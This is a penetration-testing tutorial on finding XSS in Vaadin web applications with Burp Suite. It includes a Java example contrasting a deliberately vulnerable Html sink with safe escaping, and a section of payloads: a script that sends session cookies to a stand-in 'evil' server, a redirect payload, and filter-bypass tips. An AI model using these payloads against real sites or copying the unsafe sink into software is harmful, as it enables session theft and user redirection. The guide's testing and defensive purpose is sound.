TL;DR
This guide shows you how to find Cross-Site Scripting (XSS) vulnerabilities in applications built with the Vaadin framework using Burp Suite. We’ll focus on identifying and exploiting common injection points.
1. Understanding Vaadin & XSS
Vaadin is a Java web framework for building rich internet applications. It handles much of the client-server communication for you, but this doesn’t automatically prevent XSS: any user-supplied data still needs to be properly escaped or sanitised before it is displayed, especially where a component renders it as HTML rather than plain text.
XSS happens when an attacker injects malicious JavaScript code into a website viewed by other users. This can steal cookies, redirect users, or modify page content.
2. Setting up Burp Suite
- Install and Configure: Download and install Burp Suite (Community Edition is sufficient for basic testing). Configure your browser to use Burp as a proxy.
- Intercepting Traffic: Ensure Burp Suite is intercepting all HTTP(S) traffic between your browser and the Vaadin application. You should see requests appear in the ‘Proxy’ tab.
3. Identifying Potential Injection Points
Vaadin applications often use components like TextField, TextArea, and Label to display user input. These are prime candidates for XSS vulnerabilities.
- Explore the Application: Thoroughly navigate the Vaadin application, interacting with all input fields and features.
- Focus on User Input: Pay close attention to any field where you can enter text or data that is later displayed back to you (e.g., search boxes, comments, forms).
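The two passages above (the need to sanitise before display, and the components that echo user input) come together in the following Vaadin Flow view. It is an added example, not code from the original guide or from the Vaadin project; it assumes Vaadin Flow 14 or later and jsoup on the classpath (Vaadin bundles it), and the route name and class name are hypothetical.

```java
// Added example (not from the original guide): the same search term echoed
// through an unsafe sink and through two safe alternatives.
// Assumes Vaadin Flow 14+ and jsoup (bundled with Vaadin).
import com.vaadin.flow.component.Html;
import com.vaadin.flow.component.html.Div;
import com.vaadin.flow.component.html.Span;
import com.vaadin.flow.component.orderedlayout.VerticalLayout;
import com.vaadin.flow.component.textfield.TextField;
import com.vaadin.flow.router.Route;
import org.jsoup.Jsoup;
import org.jsoup.safety.Safelist;

@Route("search-echo") // hypothetical route name
public class SearchEchoView extends VerticalLayout {

    private final Div results = new Div();

    public SearchEchoView() {
        TextField query = new TextField("Search");
        // Every value change re-renders the term; this is the reflection point
        // a tester would probe with the guide's payloads.
        query.addValueChangeListener(event -> render(event.getValue()));
        add(query, results);
    }

    private void render(String term) {
        results.removeAll();
        results.add(unsafeEcho(term));
        results.add(safeTextEcho(term));
        results.add(safeRichEcho(term));
    }

    // VULNERABLE: Html renders the string as raw markup, so a term containing
    // a <script> tag or an on* attribute becomes live DOM in every viewer's
    // browser. Do not ship this.
    static Html unsafeEcho(String term) {
        return new Html("<span>" + term + "</span>");
    }

    // SAFE for plain text: Span.setText sends the value as a text node; the
    // framework escapes it and the browser never parses it as HTML.
    static Span safeTextEcho(String term) {
        return new Span("You searched for: " + term);
    }

    // SAFE when limited rich text is needed: jsoup strips everything outside
    // the Safelist (scripts, event handlers, javascript: URLs) first.
    static Html safeRichEcho(String term) {
        return new Html("<span>" + Jsoup.clean(term, Safelist.basic()) + "</span>");
    }
}
```

When reviewing a Vaadin codebase, grep for `new Html(`, `setProperty("innerHTML"` and, in Vaadin 8, `ContentMode.HTML`: those are the sinks that turn the components listed above into XSS candidates.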
4. Basic XSS Payload Testing
Start with simple payloads to confirm if the application is vulnerable.
- Simple Alert: Try injecting a basic JavaScript alert box payload in an input field:
  <script>alert('XSS')</script>
- Intercept and Modify: In Burp Suite’s ‘Proxy’ tab, intercept the request containing your payload. Forward this modified request to the server.
- Right-click on the request in the Proxy history.
- Select “Send to Repeater”.
- In Repeater, modify the parameter value with your XSS payload and send it.
- Check Response: Examine the server’s response for your payload echoed back unescaped, then view the affected page in your browser. If an alert box pops up, you’ve found a basic XSS vulnerability.
5. Advanced Payload Testing
If simple alerts work, try more sophisticated payloads to demonstrate impact.
- Cookie Stealing: Attempt to steal the user’s session cookie:
  <script>document.location='http://your-evil-server.com/?cookie='+document.cookie;</script>
  (Replace http://your-evil-server.com/ with your own server.)
- Redirecting Users: Try redirecting the user to a malicious website:
  <script>window.location='http://your-malicious-website.com/';</script>
  (Replace http://your-malicious-website.com/ with your own server.)
- Bypass Filters: Vaadin applications may have input filters. Try bypassing these using techniques like:
- Encoding (HTML entities, URL encoding)
- Case variations (e.g., <ScRiPt>)
- Using different event handlers (e.g., onload instead of onclick)
6. Using Burp Suite Scanner
Burp Suite’s scanner can automate some XSS detection.
- Scan Target: Right-click on a request in the Proxy history and select “Actively scan this host”.
- Configure Scan: Adjust scan settings as needed (e.g., crawl depth, attack vectors).
- Review Results: Examine the scanner’s results for potential XSS vulnerabilities. Be sure to manually verify any reported issues.
7. Reporting Vulnerabilities
If you find an XSS vulnerability, report it responsibly to the application developers. Include detailed steps to reproduce the issue and the payloads used.